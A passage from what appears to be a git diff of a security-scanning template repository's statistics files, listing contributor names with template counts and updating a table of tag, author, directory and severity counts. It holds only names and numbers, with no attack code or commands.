thefrogy","count":8},{"name":"aashiq","count":8},{"name":"veshraj","count":8},{"name":"_0xf4n9x_","count":8},{"name":"zh","count":8},{"name":"noraj","count":8},{"name":"irshad ahamed","count":8},{"name":"dr_set","count":7},{"name":"amit-jd","count":7},{"name":"its0x08","count":7},{"name":"nodauf","count":7},{"name":"leovalcante","count":7},{"name":"techryptic (@tech)","count":7},{"name":"kophjager007","count":7},{"name":"caspergn","count":7},{"name":"tarunkoyalwar","count":7},{"name":"randomstr1ng","count":7},{"name":"harshbothra_","count":7},{"name":"huta0","count":7},{"name":"divya_mudgal","count":7},{"name":"me_dheeraj (https://twitter.com/dheerajmadhukar)","count":6},{"name":"gitlab red team","count":6},{"name":"justaacat","count":6},{"name":"megamansec","count":6},{"name":"praetorian-thendrickson","count":6},{"name":"imnightmaree","count":6},{"name":"xelkomy","count":6},{"name":"byt3bl33d3r","count":6},{"name":"lucky0x0d","count":6},{"name":"forgedhallpass","count":6},{"name":"clem9669","count":6},{"name":"evan rubinstein","count":6},{"name":"ja1sh","count":6},{"name":"hahwul","count":6},{"name":"devang-solanki","count":6},{"name":"puzzlepeaches","count":6},{"name":"nvn1729","count":6},{"name":"__fazal","count":6},{"name":"pathtaga","count":6},{"name":"icarot","count":6},{"name":"pentest_swissky","count":6},{"name":"andreluna","count":5},{"name":"king-alexander","count":5},{"name":"ice3man543","count":5},{"name":"arm!tage","count":5},{"name":"r12w4n","count":5},{"name":"s0obi","count":5},{"name":"panch0r3d","count":5},{"name":"yanyun","count":5},{"name":"your3cho","count":5},{"name":"podalirius","count":5},{"name":"isacaya","count":5},{"name":"prajiteshsingh","count":5},{"name":"gtrrnr","count":5},{"name":"kh4sh3i","count":5},{"name":"robotshell","count":5},{"name":"pulsesecurity.co.nz","count":5},{"name":"vicrack","count":5},{"name":"shine","count":5},{"name":"ganofins","count":5},{"name":"r3naissance","count":5},{"name":"mr-xn","count":5},{"name":"joanbono","count":5},{"name":"powerexploit","count":5},{"name":"defr0ggy","count":5},{"name":"0xr2r","count":4},{"name":"heeress","count":4},{"name":"k0pak4","count":4},{"name":"e_schultze_","count":4},{"name":"iamnooob","count":4},{"name":"jpg0mez","count":4},{"name":"incogbyte","count":4},{"name":"ggranjus","count":4},{"name":"cookiehanhoan","count":4},{"name":"dadevel","count":4},{"name":"flx","count":4},{"name":"xxcdd","count":4},{"name":"tanq16","count":4},{"name":"shankar acharya","count":4},{"name":"m4lwhere","count":4},{"name":"h1ei1","count":4},{"name":"nybble04","count":4},{"name":"dolev farhi","count":4},{"name":"scent2d","count":4},{"name":"3th1c_yuk1","count":4},{"name":"lum8rjack","count":4},{"name":"wisnupramoedya","count":4},{"name":"taielab","count":3},{"name":"alifathi-h1","count":3},{"name":"vsh00t","count":3},{"name":"parth","count":3},{"name":"xianke","count":3},{"name":"charles d","count":3},{"name":"cheesymoon","count":3},{"name":"z3bd","count":3},{"name":"dudez","count":3},{"name":"sushantkamble","count":3},{"name":"andydoering","count":3},{"name":"_generic_human_","count":3},{"name":"evergreencartoons","count":3},{"name":"salts","count":3},{"name":"lucasljm2001","count":3},{"name":"ph33r","count":3},{"name":"lark-lab","count":3},{"name":"randomrobbie","count":3},{"name":"huowuzhao","count":3},{"name":"badboycxcc","count":3},{"name":"c4sper0","count":3},{"name":"emenalf","count":3},{"name":"e1a","count":3},{"name":"impramodsargar","count":3},{"name":"fxploit","count":3},{"name":"farish","count":3},{"name":"dr0pd34d","count":3},{"name":"coldfish","count":3},{"name":"mavericknerd","count":3},{"name":"shifacyclewala","count":3},{"name":"bernardofsr","count":3},{"name":"whoever","count":3},{"name":"f1tz","count":3},{"name":"true13","count":3},{"name":"atomiczsec","count":3},{"name":"skeltavik","count":3},{"name":"binaryfigments","count":3},{"name":"davidmckennirey","count":3},{"name":"swissky","count":3},{"name":"johnjhacking","count":3},{"name":"vagnerd","count":3},{"name":"jarijaas","count":3},{"name":"ambassify","count":3},{"name":"ekrause","count":3},{"name":"j3ssie","count":3},{"name":"unstabl3","count":3},{"name":"omranisecurity","count":3},{"name":"thomas_from_offensity","count":3},{"name":"arcc","count":3},{"name":"fyoorer","count":3},{"name":"splint3r7","count":3},{"name":"canberbamber","count":3},{"name":"aringo","count":3},{"name":"yuzhe-zhang-0","count":3},{"name":"0w4ys","count":3},{"name":"matt galligan","count":3},{"name":"0xkayala","count":3},{"name":"me9187","count":3},{"name":"imjust0","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"t3l3machus","count":2},{"name":"bing0o","count":2},{"name":"hetroublemakr","count":2},{"name":"davidegirardi","count":2},{"name":"c3l3si4n","count":2},{"name":"liwermor","count":2},{"name":"nuk3s3c","count":2},{"name":"korteke","count":2},{"name":"0xelkomy","count":2},{"name":"x1m_martijn","count":2},{"name":"dogancanbakir","count":2},{"name":"ree4pwn","count":2},{"name":"cckuakilong","count":2},{"name":"666asd","count":2},{"name":"martincodes-de","count":2},{"name":"amsda","count":2},{"name":"h0j3n","count":2},{"name":"redteambrasil","count":2},{"name":"luci","count":2},{"name":"shankaracharya","count":2},{"name":"thabisocn","count":2},{"name":"vavkamil","count":2},{"name":"brucelsone","count":2},{"name":"kiblyn11","count":2},{"name":"michal mikolas (nanuqcz)","count":2},{"name":"streetofhackerr007","count":2},{"name":"d4vy","count":2},{"name":"w4cky_","count":2},{"name":"convisoappsec","count":2},{"name":"moritz nentwig","count":2},{"name":"bp0lr","count":2},{"name":"joshua rogers","count":2},{"name":"gal nagli","count":2},{"name":"serrapa","count":2},{"name":"k11h-de","count":2},{"name":"bmcel","count":2},{"name":"rafaelwdornelas","count":2},{"name":"topscoder","count":2},{"name":"ritesh_gohil(#l4stpl4y3r)","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"6mile","count":2},{"name":"zy9ard3","count":2},{"name":"israel comazzetto dos reis","count":2},{"name":"lotusdll","count":2},{"name":"0xnirvana","count":2},{"name":"maximus decimus","count":2},{"name":"0xcrypto","count":2},{"name":"codexlynx","count":2},{"name":"geekby","count":2},{"name":"foulenzer","count":2},{"name":"herry","count":2},{"name":"sbani","count":2},{"name":"afaq","count":2},{"name":"cocxanh","count":2},{"name":"christianpoeschl","count":2},{"name":"0xrudra","count":2},{"name":"raesene","count":2},{"name":"sascha brendel","count":2},{"name":"z0ne","count":2},{"name":"randomdhiraj","count":2},{"name":"egemenkochisarli","count":2},{"name":"ricardo maia (brainfork)","count":2},{"name":"bananabr","count":2},{"name":"mrharshvardhan","count":2},{"name":"g4l1t0","count":2},{"name":"8arthur","count":2},{"name":"0xsapra","count":2},{"name":"wa1tf0rme","count":2},{"name":"msegoviag","count":2},{"name":"kishore-hariram","count":2},{"name":"danmcinerney","count":2},{"name":"ep1csage","count":2},{"name":"kre80r","count":2},{"name":"dheerajmadhukar","count":2},{"name":"y4er","count":2},{"name":"ayadim","count":2},{"name":"clarkvoss","count":2},{"name":"joshlarsen","count":2},{"name":"ehsahil","count":2},{"name":"cristi vlad (@cristivlad25)","count":2},{"name":"thardt-praetorian","count":2},{"name":"zomsop82","count":2},{"name":"github.com/its0x08","count":2},{"name":"socketz","count":2},{"name":"notnotnotveg","count":2},{"name":"pxmme1337","count":2},{"name":"myztique","count":2},{"name":"brenocss","count":2},{"name":"charles d.","count":2},{"name":"lstatro","count":2},{"name":"sy3omda","count":2},{"name":"udit_thakkur","count":2},{"name":"paradessia","count":2},{"name":"dahse89","count":2},{"name":"mzack9999","count":2},{"name":"koti2","count":2},{"name":"thezakman","count":2},{"name":"sinkettu","count":2},{"name":"uomogrande","count":2},{"name":"arliya","count":2},{"name":"0xsmiley","count":2},{"name":"danielmofer","count":2},{"name":"shelled","count":2},{"name":"thevillagehacker","count":2},{"name":"pbuff07","count":2},{"name":"gevakun","count":2},{"name":"joeldeleep","count":2},{"name":"supr4s","count":2},{"name":"n-thumann","count":2},{"name":"nkxxkn","count":2},{"name":"amirhossein raeisi","count":2},{"name":"dbrwsky","count":2},{"name":"parzival","count":2},{"name":"ajaysenr","count":2},{"name":"manas_harsh","count":2},{"name":"supras","count":2},{"name":"v0idc0de","count":2},{"name":"paperpen","count":2},{"name":"bsysop","count":2},{"name":"hackerarpan","count":2},{"name":"usdag","count":2},{"name":"florianmaak","count":2},{"name":"petergrifin","count":1},{"name":"mah3sec_","count":1},{"name":"bibeksapkota (sar00n)","count":1},{"name":"mchklt","count":1},{"name":"pussycat0","count":1},{"name":"cbadke","count":1},{"name":"0xparth","count":1},{"name":"luciannitescu","count":1},{"name":"duty_1g","count":1},{"name":"omarkurt","count":1},{"name":"napgh0st","count":1},{"name":"izn0u","count":1},{"name":"godfatherorwa","count":1},{"name":"pratik khalane","count":1},{"name":"babybash","count":1},{"name":"absshax","count":1},{"name":"jteles","count":1},{"name":"retr0","count":1},{"name":"mass0ma","count":1},{"name":"bad5ect0r","count":1},{"name":"vinit989","count":1},{"name":"alevsk","count":1},{"name":"carlosvieira","count":1},{"name":"xshuden","count":1},{"name":"defektive","count":1},{"name":"queencitycyber","count":1},{"name":"zsusac","count":1},{"name":"fpatrik","count":1},{"name":"becivells","count":1},{"name":"rinolock","count":1},{"name":"spac3wh1te","count":1},{"name":"hüseyin tintaş","count":1},{"name":"dhiyanesdk","count":1},{"name":"zeroc00i","count":1},{"name":"chron0x","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"gonski","count":1},{"name":"akokonunes","count":1},{"name":"luqmaan hadia [luqiih](https://github.com/luqiih)","count":1},{"name":"adamparsons","count":1},{"name":"domenicoveneziano","count":1},{"name":"jbaines-r7","count":1},{"name":"archer","count":1},{"name":"ap3r","count":1},{"name":"shiar","count":1},{"name":"liquidsec","count":1},{"name":"p-l-","count":1},{"name":"0xrod","count":1},{"name":"drewvravick","count":1},{"name":"akash.c","count":1},{"name":"arqsz","count":1},{"name":"patrick pirker","count":1},{"name":"dk999","count":1},{"name":"danigoland","count":1},{"name":"breno_css","count":1},{"name":"0xtavian","count":1},{"name":"galoget","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"hanlaomo","count":1},{"name":"ynnirc","count":1},{"name":"mesaglio","count":1},{"name":"jfbes","count":1},{"name":"mihhailsokolov","count":1},{"name":"act1on3","count":1},{"name":"dwbzn","count":1},{"name":"myst7ic","count":1},{"name":"unknown","count":1},{"name":"ahmed abou-ela","count":1},{"name":"shockwave","count":1},{"name":"team syslifters / christoph mahrl","count":1},{"name":"jacalynli","count":1},{"name":"sshell","count":1},{"name":"youngpope","count":1},{"name":"kaks3c","count":1},{"name":"unblvr1","count":1},{"name":"diablo","count":1},{"name":"shiva (strobes security)","count":1},{"name":"harryha","count":1},{"name":"b0rn2r00t","count":1},{"name":"banana69","count":1},{"name":"yhy0","count":1},{"name":"xiaowangsec","count":1},{"name":"miryangjung","count":1},{"name":"lbb","count":1},{"name":"chesterblue","count":1},{"name":"affix","count":1},{"name":"calumjelrick","count":1},{"name":"miroslavsotak","count":1},{"name":"wlayzz","count":1},{"name":"kareemse1im","count":1},{"name":"yiran","count":1},{"name":"savik","count":1},{"name":"husain","count":1},{"name":"hakimkt","count":1},{"name":"d4ly","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"natto97","count":1},{"name":"samuelsamuelsamuel","count":1},{"name":"nagli","count":1},{"name":"alperenkesk","count":1},{"name":"orpheus","count":1},{"name":"jcockhren","count":1},{"name":"jbertman","count":1},{"name":"mubassirpatel","count":1},{"name":"watchtowr","count":1},{"name":"secthebit","count":1},{"name":"fopina","count":1},{"name":"bywalks","count":1},{"name":"berkdusunur","count":1},{"name":"shivanshkhari","count":1},{"name":"undefl0w","count":1},{"name":"akshansh","count":1},{"name":"sttlr","count":1},{"name":"jub0bs","count":1},{"name":"matthew nickerson (b0than) @ layer 8 security","count":1},{"name":"b0yd","count":1},{"name":"rschio","count":1},{"name":"daffianfo","count":1},{"name":"noamrathaus","count":1},{"name":"luskabol","count":1},{"name":"omarjezi","count":1},{"name":"hexcat","count":1},{"name":"am0nt31r0","count":1},{"name":"deena","count":1},{"name":"sicksec","count":1},{"name":"exploitation","count":1},{"name":"vulnspace","count":1},{"name":"aravind","count":1},{"name":"yaser_s","count":1},{"name":"noobexploiter","count":1},{"name":"mayank_pandey01","count":1},{"name":"lingtren","count":1},{"name":"adrianmf","count":1},{"name":"metascan","count":1},{"name":"phyr3wall","count":1},{"name":"push4d","count":1},{"name":"arr0way","count":1},{"name":"sdcampbell","count":1},{"name":"sechunt3r","count":1},{"name":"x6263","count":1},{"name":"lady_bug","count":1},{"name":"yashgoti","count":1},{"name":"exid","count":1},{"name":"petruknisme","count":1},{"name":"christbowel","count":1},{"name":"eremit4","count":1},{"name":"davidfegyver","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"m0ck3d","count":1},{"name":"dorkerdevil","count":1},{"name":"ola456","count":1},{"name":"zn9988","count":1},{"name":"hczdmr","count":1},{"name":"rumble773","count":1},{"name":"gboddin","count":1},{"name":"kr1shna4garwal","count":1},{"name":"stupidfish","count":1},{"name":"iampritam","count":1},{"name":"adnanekhan","count":1},{"name":"soyelmago","count":1},{"name":"kabirsuda","count":1},{"name":"none","count":1},{"name":"r3nz0","count":1},{"name":"regala_","count":1},{"name":"_c0wb0y_","count":1},{"name":"abdullahisik","count":1},{"name":"jeya.seelan","count":1},{"name":"remi gascou (podalirius)","count":1},{"name":"patralos","count":1},{"name":"juicypotato1","count":1},{"name":"esonhugh","count":1},{"name":"qianbenhyu","count":1},{"name":"therealtoastycat","count":1},{"name":"wabafet","count":1},{"name":"0ut0fb4nd","count":1},{"name":"juliosmelo","count":1},{"name":"n0el4kls","count":1},{"name":"dabla","count":1},{"name":"bernardo rodrigues @bernardofsr","count":1},{"name":"pphuahua","count":1},{"name":"screamy","count":1},{"name":"aresx","count":1},{"name":"staticnoise","count":1},{"name":"chetgan","count":1},{"name":"ahmetpergamum","count":1},{"name":"adilsoybali","count":1},{"name":"bughuntersurya","count":1},{"name":"abbas.heybati","count":1},{"name":"nobody","count":1},{"name":"dievus","count":1},{"name":"sec_hawk","count":1},{"name":"pdp","count":1},{"name":"shivampand3y","count":1},{"name":"ofjaaah","count":1},{"name":"apt-mirror","count":1},{"name":"sorrowx3","count":1},{"name":"jc175","count":1},{"name":"marcio mendes","count":1},{"name":"mantissts","count":1},{"name":"co0nan","count":1},{"name":"pascalheidmann","count":1},{"name":"kchason","count":1},{"name":"droberson","count":1},{"name":"michael wedl","count":1},{"name":"tim_koopmans","count":1},{"name":"sospiro","count":1},{"name":"millermedia","count":1},{"name":"luqman","count":1},{"name":"higor melgaço","count":1},{"name":"0xcharan","count":1},{"name":"ayadi","count":1},{"name":"willd96","count":1},{"name":"dale clarke","count":1},{"name":"jaskaran","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"0xprial","count":1},{"name":"invisiblethreat","count":1},{"name":"micha3lb3n","count":1},{"name":"mlec","count":1},{"name":"rivalsec","count":1},{"name":"kaizensecurity","count":1},{"name":"imhunterand","count":1},{"name":"allenwest24","count":1},{"name":"ok_bye_now","count":1},{"name":"philippdelteil","count":1},{"name":"apple","count":1},{"name":"gpiechnik2","count":1},{"name":"elmahdi","count":1},{"name":"ldionmarcil","count":1},{"name":"8authur","count":1},{"name":"alex","count":1},{"name":"failopen","count":1},{"name":"sherlocksecurity","count":1},{"name":"ohlinge","count":1},{"name":"lrtk-coder","count":1},{"name":"nytr0gen","count":1},{"name":"s1r1u5_","count":1},{"name":"guax1","count":1},{"name":"anonymous","count":1},{"name":"ndmalc","count":1},{"name":"schniggie","count":1},{"name":"vikas kundu","count":1},{"name":"null_hypothesis","count":1},{"name":"qlkwej","count":1},{"name":"jiheon-dev","count":1},{"name":"sw0rk17","count":1},{"name":"smaranchand","count":1},{"name":"daviey","count":1},{"name":"technicaljunkie","count":1},{"name":"evolutionsec","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"anon-artist","count":1},{"name":"byobin","count":1},{"name":"shreyapohekar","count":1},{"name":"elouhi","count":1},{"name":"xeldax","count":1},{"name":"elder tao","count":1},{"name":"1nf1n7y","count":1},{"name":"xstp","count":1},{"name":"vzamanillo","count":1},{"name":"stux","count":1},{"name":"ooooooo_q","count":1},{"name":"furkansenan","count":1},{"name":"fq_hsu","count":1},{"name":"whotwagner","count":1},{"name":"puben","count":1},{"name":"f0xy","count":1},{"name":"amnotacat","count":1},{"name":"charanrayudu","count":1},{"name":"makyotox","count":1},{"name":"luqmaan hadia","count":1},{"name":"ipanda","count":1},{"name":"rotemreiss","count":1},{"name":"william söderberg @ withsecure","count":1},{"name":"pwnwithlove","count":1},{"name":"exceed","count":1},{"name":"kagamigawa","count":1},{"name":"httpvoid","count":1},{"name":"mordavid","count":1},{"name":"whynotke","count":1},{"name":"kresec","count":1},{"name":"knassar702","count":1},{"name":"prettyboyaaditya","count":1},{"name":"arjunchandarana","count":1},{"name":"th3r4id","count":1},{"name":"borna nematzadeh","count":1},{"name":"aron molnar","count":1},{"name":"rotembar","count":1},{"name":"mukundbhuva","count":1},{"name":"_darrenmartyn","count":1},{"name":"0xceeb","count":1},{"name":"open-sec","count":1},{"name":"infosecsanyam","count":1},{"name":"j33n1k4","count":1},{"name":"f1she3","count":1},{"name":"toufik-airane","count":1},{"name":"elitebaz","count":1},{"name":"nerrorsec","count":1},{"name":"opencirt","count":1},{"name":"marcos_iaf","count":1},{"name":"sanineng","count":1},{"name":"mayankpandey01","count":1},{"name":"mbmy","count":1},{"name":"higor melgaço (eremit4)","count":1},{"name":"xc1ym","count":1},{"name":"udinchan","count":1},{"name":"freakyclown","count":1},{"name":"majidmc2","count":1},{"name":"palanichamy_perumal","count":1},{"name":"0xteles","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"jrolf","count":1},{"name":"professorabhay","count":1},{"name":"jeya seelan","count":1},{"name":"kiransau","count":1},{"name":"drfabiocastro","count":1},{"name":"nan-kl","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"dawid-czarnecki","count":1},{"name":"david botelho mariano","count":1},{"name":"fur1na","count":1},{"name":"mohammedsaneem","count":1},{"name":"blckraven","count":1},{"name":"bartu utku sarp","count":1},{"name":"houdinis","count":1},{"name":"5up3r541y4n","count":1},{"name":"clment cruchet","count":1},{"name":"jaimin gondaliya","count":1},{"name":"tehtbl","count":1},{"name":"hyunsoo-ds","count":1},{"name":"unp4ck","count":1},{"name":"mohammad reza omrani | @omranisecurity","count":1},{"name":"high","count":1},{"name":"furkansayim","count":1},{"name":"af001","count":1},{"name":"booboohq","count":1},{"name":"jadu101","count":1},{"name":"danfaizer","count":1},{"name":"barthy.koeln","count":1},{"name":"lamscun","count":1},{"name":"zinminphy0","count":1},{"name":"d0rkerdevil","count":1},{"name":"jas37","count":1},{"name":"compr00t","count":1},{"name":"th3.d1p4k","count":1},{"name":"axrk","count":1},{"name":"official_blackhat13","count":1},{"name":"floriandewald","count":1},{"name":"naglis","count":1},{"name":"_harleo","count":1},{"name":"2rs3c","count":1},{"name":"carson chan","count":1},{"name":"thirukrishnan","count":1},{"name":"narluin","count":1},{"name":"andysvints","count":1},{"name":"w0tx","count":1},{"name":"mhdsamx","count":1},{"name":"mariam tariq","count":1},{"name":"oscarintherocks","count":1},{"name":"numan türle","count":1},{"name":"w8ay","count":1},{"name":"igibanez","count":1},{"name":"y0no","count":1},{"name":"bugvsme","count":1},{"name":"pudsec","count":1},{"name":"irshadahamed","count":1},{"name":"matt miller","count":1},{"name":"unkl4b","count":1},{"name":"notsoevilweasel","count":1},{"name":"ledoubletake","count":1},{"name":"hlop","count":1},{"name":"amir-h-fallahi","count":1},{"name":"hel10-web","count":1},{"name":"pry0cc","count":1},{"name":"momen eldawakhly","count":1},{"name":"0xd0ff9","count":1},{"name":"sinsinology","count":1},{"name":"rodnt","count":1},{"name":"pjborah","count":1},{"name":"zhenwarx","count":1},{"name":"ransomsec","count":1},{"name":"r3s ost","count":1},{"name":"realexp3rt","count":1},{"name":"vthiery","count":1},{"name":"couskito","count":1},{"name":"rojanrijal","count":1},{"name":"dali","count":1},{"name":"colbyjack1134","count":1},{"name":"tea","count":1},{"name":"hakluke","count":1},{"name":"aringo-bf","count":1},{"name":"thebinitghimire","count":1},{"name":"flag007","count":1},{"name":"josecosta","count":1},{"name":"justmumu","count":1},{"name":"intx0x80","count":1},{"name":"wpsec","count":1},{"name":"johndoeanonita","count":1},{"name":"nuts7","count":1},{"name":"aaronchen0","count":1},{"name":"themiddle","count":1},{"name":"nielsing","count":1},{"name":"evan rubinstien","count":1},{"name":"amirmsafari","count":1},{"name":"phillipo","count":1},{"name":"jna1","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"andirrahmani1","count":1},{"name":"b4uh0lz","count":1},{"name":"bjxsec","count":1},{"name":"kurohost","count":1},{"name":"cravaterouge","count":1},{"name":"aaban solutions","count":1},{"name":"viondexd","count":1},{"name":"carrot2","count":1},{"name":"alexrydzak","count":1},{"name":"viniciuspereiras","count":1},{"name":"amanrawat","count":1},{"name":"rubina119","count":1},{"name":"michal-mikolas","count":1},{"name":"revblock","count":1},{"name":"jonathanwalker","count":1},{"name":"ruppde","count":1},{"name":"iphantasmic","count":1},{"name":"mohsen yaghoubi","count":1},{"name":"paper-pen","count":1},{"name":"un-fmunozs","count":1},{"name":"sak1","count":1},{"name":"sickwell","count":1},{"name":"hardik-rathod","count":1},{"name":"ramondunker","count":1},{"name":"manuelbua","count":1},{"name":"brabbit10","count":1},{"name":"h4kux","count":1},{"name":"noah @thesubtlety","count":1},{"name":"piyushchhiroliya","count":1},{"name":"miguelsegoviagil","count":1},{"name":"shelld3v","count":1},{"name":"joaonevess","count":1},{"name":"ilovebinbash","count":1},{"name":"yavolo","count":1},{"name":"ky9oss","count":1},{"name":"olewagner","count":1},{"name":"k3rwin","count":1},{"name":"zeyad azima","count":1},{"name":"mys7ic","count":1},{"name":"west-wise","count":1},{"name":"shifacyclewla","count":1},{"name":"bjhulst","count":1},{"name":"zandros0","count":1},{"name":"mr.bobo hp","count":1},{"name":"tirtha_mandal","count":1},{"name":"yusakie","count":1},{"name":"dmartyn","count":1},{"name":"denandz","count":1},{"name":"ringo","count":1},{"name":"remonsec","count":1},{"name":"tangxiaofeng7","count":1},{"name":"hotpot","count":1},{"name":"xcapri","count":1},{"name":"udyz","count":1},{"name":"hazana","count":1},{"name":"notwhy","count":1},{"name":"djoevanka","count":1},{"name":"mammad_rahimzada","count":1},{"name":"lark lab","count":1},{"name":"s1r1us","count":1},{"name":"osamahamad","count":1},{"name":"skylark-lab","count":1},{"name":"win3zz","count":1},{"name":"yashanand155","count":1},{"name":"lixts","count":1},{"name":"fmunozs","count":1},{"name":"0xelkomy \u0026 c0nqr0r","count":1},{"name":"ramkrishna sawant","count":1},{"name":"harshinsecurity","count":1},{"name":"geraldino2","count":1},{"name":"kiks7","count":1},{"name":"yuansec","count":1},{"name":"kailashbohara","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"francescocarlucci","count":1},{"name":"lethargynavigator","count":1},{"name":"ahmed sherif","count":1},{"name":"manasmbellani","count":1},{"name":"ptonewreckin","count":1},{"name":"thelicato","count":1},{"name":"aayush vishnoi","count":1},{"name":"yashvardhantripathi","count":1},{"name":"0xceba","count":1},{"name":"ph33rr","count":1},{"name":"mabdullah22","count":1},{"name":"h4sh5","count":1},{"name":"tirtha","count":1},{"name":"arall","count":1},{"name":"0h1in9e","count":1},{"name":"pepitoh","count":1},{"name":"mrcl0wnlab","count":1},{"name":"0xh7ml","count":1},{"name":"ling","count":1},{"name":"erikowen","count":1},{"name":"hateshape","count":1},{"name":"erethon","count":1},{"name":"retr02332","count":1},{"name":"caon","count":1}],"directory":[{"name":"http","count":7663},{"name":"file","count":402},{"name":"workflows","count":191},{"name":"network","count":135},{"name":"cloud","count":134},{"name":"code","count":81},{"name":"javascript","count":61},{"name":"ssl","count":29},{"name":"dast","count":25},{"name":"dns","count":22},{"name":"headless","count":12},{"name":"TEMPLATES-STATS.json","count":1},{"name":"cves.json","count":1},{"name":"passive","count":1},{"name":"contributors.json","count":1}],"severity":[{"name":"info","count":3789},{"name":"high","count":1816},{"name":"medium","count":1578},{"name":"critical","count":1071},{"name":"low","count":271},{"name":"unknown","count":40}],"types":[{"name":"file","count":402},{"name":"dns","count":25}]} diff --git a/TEMPLATES-STATS.md b/TEMPLATES-STATS.md index 047875ee65..4e4ba3d07e 100644 --- a/TEMPLATES-STATS.md +++ b/TEMPLATES-STATS.md @@ -1,5583 +1,5625 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |--------------------------------------------------------|-------|---------------------------------------|-------|----------------------|-------|----------|-------|------|-------| -| cve | 2540 | dhiyaneshdk | 1334 | http | 7593 | info | 3780 | file | 402 | -| panel | 1163 | daffainfo | 864 | file | 402 | high | 1786 | dns | 25 | -| wordpress | 996 | dwisiswant0 | 803 | workflows | 191 | medium | 1560 | | | -| exposure | 955 | pussycat0x | 430 | network | 135 | critical | 1058 | | | -| xss | 913 | ritikchaddha | 366 | cloud | 134 | low | 268 | | | -| wp-plugin | 865 | pikpikcu | 353 | code | 81 | unknown | 39 | | | -| osint | 804 | princechaddha | 303 | javascript | 60 | | | | | -| tech | 694 | pdteam | 297 | ssl | 29 | | | | | -| lfi | 670 | ricardomaia | 238 | dast | 22 | | | | | -| misconfig | 660 | geeknik | 231 | dns | 22 | | | | | -| rce | 610 | theamanrawat | 213 | headless | 12 | | | | | +| cve | 2571 | dhiyaneshdk | 1351 | http | 7663 | info | 3789 | file | 402 | +| panel | 1167 | daffainfo | 864 | file | 402 | high | 1816 | dns | 25 | +| wordpress | 1002 | dwisiswant0 | 803 | workflows | 191 | medium | 1578 | | | +| exposure | 968 | pussycat0x | 439 | network | 135 | critical | 1071 | | | +| xss | 917 | ritikchaddha | 380 | cloud | 134 | low | 271 | | | +| wp-plugin | 872 | pikpikcu | 353 | code | 81 | unknown | 40 | | | +| osint | 804 | princechaddha | 303 | javascript | 61 | | | | | +| tech | 698 | pdteam | 297 | ssl | 29 | | | | | +| lfi | 678 | ricardomaia | 239 | dast | 25 | | | | | +| misconfig | 673 | geeknik | 231 | dns | 22 | | | | | +| rce | 616 | theamanrawat | 213 | headless | 12 | | | | | | edb | 597 | r3y3r53 | 199 | cves.json | 1 | | | | | -| packetstorm | 542 | 0x_akoko | 179 | TEMPLATES-STATS.json | 1 | | | | | -| wpscan | 505 | gy741 | 158 | contributors.json | 1 | | | | | +| packetstorm | 546 | 0x_akoko | 179 | contributors.json | 1 | | | | | +| wpscan | 506 | gy741 | 162 | TEMPLATES-STATS.json | 1 | | | | | | cve2021 | 493 | righettod | 156 | passive | 1 | | | | | | cve2022 | 472 | rxerium | 145 | | | | | | | -| wp | 431 | sleepingbag945 | 132 | | | | | | | -| cve2023 | 384 | arafatansari | 118 | | | | | | | -| unauth | 368 | tess | 109 | | | | | | | -| sqli | 361 | pdresearch | 84 | | | | | | | -| file | 345 | iamnoooob | 69 | | | | | | | -| authenticated | 343 | idealphase | 66 | | | | | | | -| intrusive | 310 | madrobot | 65 | | | | | | | -| detect | 308 | zzeitlin | 64 | | | | | | | -| login | 295 | rootxharsh | 62 | | | | | | | -| kev | 275 | akincibor | 59 | | | | | | | -| cve2020 | 255 | for3stco1d | 55 | | | | | | | +| wp | 435 | sleepingbag945 | 132 | | | | | | | +| cve2023 | 393 | arafatansari | 118 | | | | | | | +| unauth | 370 | tess | 109 | | | | | | | +| sqli | 370 | pdresearch | 85 | | | | | | | +| file | 345 | iamnoooob | 71 | | | | | | | +| authenticated | 344 | idealphase | 66 | | | | | | | +| detect | 313 | madrobot | 65 | | | | | | | +| intrusive | 312 | zzeitlin | 64 | | | | | | | +| login | 299 | rootxharsh | 63 | | | | | | | +| kev | 277 | akincibor | 59 | | | | | | | +| cve2020 | 256 | for3stco1d | 55 | | | | | | | | token-spray | 243 | philippedelteil | 52 | | | | | | | -| oast | 222 | johnk3r | 44 | | | | | | | -| config | 221 | gaurang | 42 | | | | | | | -| top-200 | 221 | edoardottt | 40 | | | | | | | -| default-login | 217 | c-sh0 | 35 | | | | | | | +| config | 224 | johnk3r | 45 | | | | | | | +| oast | 223 | gaurang | 42 | | | | | | | +| default-login | 222 | edoardottt | 40 | | | | | | | +| top-200 | 222 | c-sh0 | 35 | | | | | | | | devops | 212 | j4vaovo | 34 | | | | | | | -| osint-social | 210 | luisfelipe146 | 31 | | | | | | | -| malware | 208 | adam crosser | 31 | | | | | | | -| network | 196 | ice3man | 29 | | | | | | | -| apache | 193 | mastercho | 29 | | | | | | | -| token | 193 | pwnhxl | 28 | | | | | | | -| | 191 | hardik-solanki | 24 | | | | | | | -| cve2018 | 170 | organiccrap | 24 | | | | | | | -| cloud | 169 | ctflearner | 23 | | | | | | | +| osint-social | 210 | securityforeveryone | 32 | | | | | | | +| malware | 209 | luisfelipe146 | 31 | | | | | | | +| apache | 198 | adam crosser | 31 | | | | | | | +| network | 197 | ice3man | 29 | | | | | | | +| token | 194 | mastercho | 29 | | | | | | | +| | 191 | pwnhxl | 28 | | | | | | | +| cve2018 | 170 | hardik-solanki | 24 | | | | | | | +| cloud | 169 | organiccrap | 24 | | | | | | | | iot | 167 | techbrunchfr | 23 | | | | | | | -| cve2019 | 163 | harsh | 23 | | | | | | | -| keys | 156 | userdehghani | 22 | | | | | | | +| cve2019 | 163 | ctflearner | 23 | | | | | | | +| keys | 156 | userdehghani | 23 | | | | | | | +| install | 151 | harsh | 23 | | | | | | | | joomla | 148 | ffffffff0x | 22 | | | | | | | -| install | 147 | kazgangap | 20 | | | | | | | | redirect | 138 | parthmalhotra | 20 | | | | | | | -| tcp 